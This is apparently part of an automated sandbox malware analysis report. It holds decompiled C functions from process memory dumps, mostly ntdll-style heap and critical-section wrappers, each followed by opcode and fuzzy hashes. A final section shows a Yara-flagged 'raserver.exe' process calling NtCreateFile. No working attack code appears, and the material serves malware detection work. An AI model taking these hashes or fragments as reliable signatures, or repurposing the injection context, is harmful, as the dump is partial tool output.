				return L01674620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                      0x01673a35

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction ID: 35e868ab6fc6593bb8abc080cfe9c4a7cff2e05a56c9a56a4a29fa79c5c570ed
                                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                      • Instruction Fuzzy Hash: 42C04C32180648FBC712AE45DD05F157B6AE7A4B60F154025B6040A5618976ED61D59C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0165AD30, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0165AD30(intOrPtr _a4) {

				return L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                      0x0165ad49

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction ID: 63cc1989e42e580fde413802271b640420359ccaf57187ef693fbecdb9c40d99
                                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                      • Instruction Fuzzy Hash: 25C02B330C0248BBC7126F45CD00F11BF2EE7A0B60F000020F6040B671C932EC61D98C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016676E2, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E016676E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                      0x016676e4
                                                      0x00000000
                                                      0x016676f8
                                                      0x016676fd

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction ID: 6ef9d97394f083d482283f35913545de2d9f64b96589a87fcfc6a04bd617d11c
                                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                      • Instruction Fuzzy Hash: 60C08C701411805AEB2A570CCE24B303A5AAB4860DF68019CAA01896A2C36CAC03C608
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016836CC, Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E016836CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                      0x016836d2
                                                      0x016836e8
                                                      0x016836d4
                                                      0x016836e5
                                                      0x016836e5

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction ID: cddc04d673e439a4cedfb16653a0cd97dda929a0ddbacc4be7fc96c71ed5f66f
                                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                      • Instruction Fuzzy Hash: 03C08C70150440EAD6156B248D00B147254B700A21F6403587220456E0DA28AC00D104
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01677D50, Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01677D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                      0x01677d56
                                                      0x01677d5b
                                                      0x01677d60
                                                      0x01677d5d
                                                      0x01677d5d
                                                      0x01677d5d

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction ID: f97457452346b826bed2950a4ae47fab710324dcd5568c52e1dbcea280dd54f6
                                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                      • Instruction Fuzzy Hash: CBB092363019408FCE16DF18C484B1533E4FB48A40B8400D0E400CBA21D329E8408900
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01682ACB, Relevance: .0, Instructions: 5COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01682ACB() {
				void* _t5;

				return E0166EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                      0x01682adc

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction ID: 8fa9f4b4057395ffb83fa15c22b59ce8ba15152502b00430a4e5b34b47568b2b
                                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                      • Instruction Fuzzy Hash: 9DB01232C10441CFCF02EF40CB10B197336FB00750F054494900127930C32ABC01CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699950, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec07b7a9a94a9e814e43df0e4fc093820c974d20f2fdf84954e04d7d5f3c0e95
                                                      • Instruction ID: 998ea237e22e60fa4e1f8b0d56820a7bcef14faeb629912cbf7c9ea976940206
                                                      • Opcode Fuzzy Hash: ec07b7a9a94a9e814e43df0e4fc093820c974d20f2fdf84954e04d7d5f3c0e95
                                                      • Instruction Fuzzy Hash: EC9002A120140413D14069994C056070009A7D1342FD1C011A2064595ECE698C517575
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016999D0, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25a6e1a23e6c70fb49f3d899d31b99885459fa238460e33c4327d45b62f502f0
                                                      • Instruction ID: 6303e7832bb77cb46c7a912ddfb624fc89dabe0167a04b51d49f2dc428d12d17
                                                      • Opcode Fuzzy Hash: 25a6e1a23e6c70fb49f3d899d31b99885459fa238460e33c4327d45b62f502f0
                                                      • Instruction Fuzzy Hash: 859002A121100052D104659948057070049A7E2241FD1C012A2154594CC9698C616565
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0169B040, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1e9cd96b35b7bc0623ebeef010bcd3a5f27f9e72c329d366bc94c1f7b0f55b0
                                                      • Instruction ID: 18f2a4638ab057910d635c9039c804aa08863aa73385688d2481cbd582f3cd99
                                                      • Opcode Fuzzy Hash: d1e9cd96b35b7bc0623ebeef010bcd3a5f27f9e72c329d366bc94c1f7b0f55b0
                                                      • Instruction Fuzzy Hash: 269002A1601140534540B5994C054075019B7E23413D1C121A04545A0CCAA88C55A6A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699820, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4b702969e69c6a921d3e109de4e024d41266f2430a162809ac83476ba616040b
                                                      • Instruction ID: 6a2e12aa34331e9c3e45addee9121468f974cf25f0f1b9e967b10614b46668ed
                                                      • Opcode Fuzzy Hash: 4b702969e69c6a921d3e109de4e024d41266f2430a162809ac83476ba616040b
                                                      • Instruction Fuzzy Hash: 5B90027124100412D14175994805607000DB7D1281FD1C012A0424594ECA958E56BEA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016998A0, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 148e802fb6688f70a60dbc37f2d59e765f51deab635f83647b363caaad65823c
                                                      • Instruction ID: 588e077fc437c54478b2fc9e135969b7c2e905340b5e0c278a87697f16edc260
                                                      • Opcode Fuzzy Hash: 148e802fb6688f70a60dbc37f2d59e765f51deab635f83647b363caaad65823c
                                                      • Instruction Fuzzy Hash: 9B90026130100412D10265994815607000DE7D2385FD1C012E1424595DCA658D53B572
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699B00, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8b996a9f5035e18d52af2c02cd6e2430e54f7f7ee6397ff296444f705c2c679
                                                      • Instruction ID: fc16acdd0523e7428529de4ab8597cfd9c6d4ab58fda4cd89c3b4ae281c7d03a
                                                      • Opcode Fuzzy Hash: e8b996a9f5035e18d52af2c02cd6e2430e54f7f7ee6397ff296444f705c2c679
                                                      • Instruction Fuzzy Hash: AE90026124100812D14075998815707000AE7D1641FD1C011A0024594DCA568D657AF1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0169A3B0, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 227e8f3a51ca1e1b5e961f76d54b6097ffebe501a0ddafc1b27d6a6002a07a6d
                                                      • Instruction ID: 2687b5dff657d7430eaf48cedb2a7483561de4c44ffce058c2e07af1f7c4761a
                                                      • Opcode Fuzzy Hash: 227e8f3a51ca1e1b5e961f76d54b6097ffebe501a0ddafc1b27d6a6002a07a6d
                                                      • Instruction Fuzzy Hash: 0B90027120144012D1407599884560B5009B7E1341FD1C411E0425594CCA558C56A661
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699A10, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8b8b417b51cde73c75cb67a24c807ba0b4327f37d356da29e7b46efe3b5a9bb
                                                      • Instruction ID: 01b7ef112cc8840d8795a7018b8e7ca85ea7bee6bc5a7614692eefc9bc165a28
                                                      • Opcode Fuzzy Hash: d8b8b417b51cde73c75cb67a24c807ba0b4327f37d356da29e7b46efe3b5a9bb
                                                      • Instruction Fuzzy Hash: 3090027120140412D10065994C097470009A7D1342FD1C011A5164595ECAA5CC917971
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699A80, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6af98349661024932f07018e6cc890aa1b345a611875e455612e1491e7700455
                                                      • Instruction ID: c43b9d68ba94b1d6de696b569ea9420276d1161f038f10809e0fb6e1b130bdf0
                                                      • Opcode Fuzzy Hash: 6af98349661024932f07018e6cc890aa1b345a611875e455612e1491e7700455
                                                      • Instruction Fuzzy Hash: 5A90026120144452D14066994C05B0F4109A7E2242FD1C019A4156594CCD558C556B61
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699560, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 88ae850d24bc2742b889f2bea623bf0657df2673d770e59e37f6732efafaff0d
                                                      • Instruction ID: ade7901397c1729e0d6b5300d5d0b1a6941ac665c816075e5ebb74930e1c9f8c
                                                      • Opcode Fuzzy Hash: 88ae850d24bc2742b889f2bea623bf0657df2673d770e59e37f6732efafaff0d
                                                      • Instruction Fuzzy Hash: 21900265221000120145A9990A0550B0449B7D73913D1C015F14165D0CCA618C656761
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699520, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 722f18c5d28c6df978152ff25e785e01cd74316fbd8dc1dbadea8fbde8bcf320
                                                      • Instruction ID: da0600fca1f45107674503fcc8b2269ef421894a49f37f1c3b0e73703f28ae6e
                                                      • Opcode Fuzzy Hash: 722f18c5d28c6df978152ff25e785e01cd74316fbd8dc1dbadea8fbde8bcf320
                                                      • Instruction Fuzzy Hash: 949002E1201140A24500A6998805B0B4509A7E1241BD1C016E10545A0CC9658C51A575
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0169AD30, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: de8200a96fae7d1c323667d269eb34c28189b8889fe5dd7b73e2ee7b711e95a2
                                                      • Instruction ID: b0272b059f448f4909d6dfd2eeba60181b35087b3188f59c46dfacea39d5c0c7
                                                      • Opcode Fuzzy Hash: de8200a96fae7d1c323667d269eb34c28189b8889fe5dd7b73e2ee7b711e95a2
                                                      • Instruction Fuzzy Hash: 31900271A0500022914075994C15647400AB7E1781BD5C011A0514594CCD948E5567E1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016995F0, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dfa908b2f3e08ce5e1e5991fbde705fbe90f0eeed1ae291a6f5796daa35e8247
                                                      • Instruction ID: 92897be8a9fa43ed7e81546974839150601478268c60784a9e53454e0eb36afc
                                                      • Opcode Fuzzy Hash: dfa908b2f3e08ce5e1e5991fbde705fbe90f0eeed1ae291a6f5796daa35e8247
                                                      • Instruction Fuzzy Hash: 2690027120100812D10465994C056870009A7D1341FD1C011A6024695EDAA58C917571
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699760, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a4eaff8a0c2e7cf51142fad2ae0da119c38a4d70ed07e6eef0c3ea2fac365c3
                                                      • Instruction ID: 0f336770087a02705a3a982fbcecd89c12728717c68660d838c8e1b2166ff48c
                                                      • Opcode Fuzzy Hash: 8a4eaff8a0c2e7cf51142fad2ae0da119c38a4d70ed07e6eef0c3ea2fac365c3
                                                      • Instruction Fuzzy Hash: 7F90027120100413D100659959097070009A7D1241FD1D411A0424598DDA968C517561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699770, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2061beb82af45f4d0471c6d382b836d634ca01ebc1bce24a917f69bb3b6d98bf
                                                      • Instruction ID: d881bd7d2a7e1f514dea1421eb1d22c6ad0310622efc3968c5d2408090c99a54
                                                      • Opcode Fuzzy Hash: 2061beb82af45f4d0471c6d382b836d634ca01ebc1bce24a917f69bb3b6d98bf
                                                      • Instruction Fuzzy Hash: 4790026120504452D10069995809A070009A7D1245FD1D011A10645D5DCA758C51B571
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0169A770, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2c772a64aa7e1626273890561931e7fbe8fe469f660fe08f607e60ffe126465c
                                                      • Instruction ID: e0cc19b7b7a8141722a7e5d3a802a2f13318137111a4be24903291e6f029f171
                                                      • Opcode Fuzzy Hash: 2c772a64aa7e1626273890561931e7fbe8fe469f660fe08f607e60ffe126465c
                                                      • Instruction Fuzzy Hash: E490027520504452D50069995C05A870009A7D1345FD1D411A04245DCDCA948C61B561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699730, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 120ab6b44e9944caeb613d07da388a9ea3340e6414053c883da6989472fb9df3
                                                      • Instruction ID: 7c9efd1ced489ff492ab57ab385f3b7089f079fd36b96673341f87c4746785c8
                                                      • Opcode Fuzzy Hash: 120ab6b44e9944caeb613d07da388a9ea3340e6414053c883da6989472fb9df3
                                                      • Instruction Fuzzy Hash: F790026160500412D140759958197070019A7D1241FD1D011A0024594DCA998E557AE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0169A710, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c748350f6436100c59a790afa51b45b1e3acfbdc0b96f02fc2af5b60c165a39f
                                                      • Instruction ID: 847f3e43d9c45b46c7a1685a785c69459a53c0eedcd9b7b74c0846ffc854ca87
                                                      • Opcode Fuzzy Hash: c748350f6436100c59a790afa51b45b1e3acfbdc0b96f02fc2af5b60c165a39f
                                                      • Instruction Fuzzy Hash: D8900271301000629500AAD95C05A4B4109A7F1341BD1D015A4014594CC9948C616561
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699FE0, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: caa7eb6665711bb1862c25163416c5c3264b1cc7f32e465f4c57551fdc3adf4e
                                                      • Instruction ID: 5a30a709bdd3ac845578e75a709ab96ee42cf177b318adb4c59526237bc7d994
                                                      • Opcode Fuzzy Hash: caa7eb6665711bb1862c25163416c5c3264b1cc7f32e465f4c57551fdc3adf4e
                                                      • Instruction Fuzzy Hash: 9D90027131114412D110659988057070009A7D2241FD1C411A0824598DCAD58C917562
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699650, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68374f54a35be553bb0e9da45ebdb92d662ec3be2cb5f24bef6dce0510b00b7d
                                                      • Instruction ID: 78f9e2b20782b46f79759416c2f71f2bdc3c63a7c9e83ec8ef7d83e57af3e7cf
                                                      • Opcode Fuzzy Hash: 68374f54a35be553bb0e9da45ebdb92d662ec3be2cb5f24bef6dce0510b00b7d
                                                      • Instruction Fuzzy Hash: 5F90027120504852D14075994805A470019A7D1345FD1C011A00646D4DDA658D55BAA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699610, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e8c6d1294bfc8e808278ff253744255149bd8b3ca18c7f9d0a48d6c3387c2bd
                                                      • Instruction ID: 3389fd2032030bebce490fd77726f6c4285332c7f3bbb2e35f160e73e5076389
                                                      • Opcode Fuzzy Hash: 6e8c6d1294bfc8e808278ff253744255149bd8b3ca18c7f9d0a48d6c3387c2bd
                                                      • Instruction Fuzzy Hash: D890027160500812D150759948157470009A7D1341FD1C011A0024694DCB958E557AE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016996D0, Relevance: .0, Instructions: 4COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8600245d30bd0e7360927782d2ec8903f741e7d5270bea415c6b8348ac585e80
                                                      • Instruction ID: b9f715d9c6053bae59b7ac3e88dea38242b7606e6c5051482b4141a61998e1f6
                                                      • Opcode Fuzzy Hash: 8600245d30bd0e7360927782d2ec8903f741e7d5270bea415c6b8348ac585e80
                                                      • Instruction Fuzzy Hash: 7A90027120100852D10065994805B470009A7E1341FD1C016A0124694DCA55CC517961
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01699670, Relevance: .0, Instructions: 2COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction ID: bc73986ea9df5df89962964f85018820f8c38e2fe31dfd9668f17242fd0901eb
                                                      • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                      • Instruction Fuzzy Hash:
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016EFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E016EFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0169CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E016E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E016E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                      0x016efdda
                                                      0x016efde2
                                                      0x016efde5
                                                      0x016efdec
                                                      0x016efdfa
                                                      0x016efdff
                                                      0x016efe0a
                                                      0x016efe0f
                                                      0x016efe17
                                                      0x016efe1e
                                                      0x016efe19
                                                      0x016efe19
                                                      0x016efe19
                                                      0x016efe20
                                                      0x016efe21
                                                      0x016efe22
                                                      0x016efe25
                                                      0x016efe40

                                                      APIs
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 016EFDFA
                                                      Strings
                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016EFE01
                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016EFE2B
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                      • API String ID: 885266447-3903918235
                                                      • Opcode ID: 0042ab9c2f00cc87b67a71fb65a2049f42fef29dadc6a59e65fb1173d396ceb4
                                                      • Instruction ID: eb047f0c4c49e3d40da72ff283ceb318b18ffd3136f31dc0ae90c9e2802f4406
                                                      • Opcode Fuzzy Hash: 0042ab9c2f00cc87b67a71fb65a2049f42fef29dadc6a59e65fb1173d396ceb4
                                                      • Instruction Fuzzy Hash: 26F0C276240202BBEB201A86DC06E33BB9AEB44B30F240358F628561D1DA62B83086A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Analysis Process: raserver.exe PID: 5028 Parent PID: 3388 raserver.exeCOMMON

                                                      Executed Functions

                                                      Function 00E19D60, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00E14B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00E14B87,007A002E,00000000,00000060,00000000,00000000), ref: 00E19DAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, Offset: 00E00000, based on PE: false
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID: .z`
                                                      • API String ID: 823142352-1441809116
                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction ID: 85a28a918a33892eb52c5cdf5270de74a01d4d7673ce62591be95752c1443cc8
                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                      • Instruction Fuzzy Hash: 1CF0B6B2201108ABCB08CF88DC85DEB77EDAF8C754F158248BA1D97241C630E8518BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

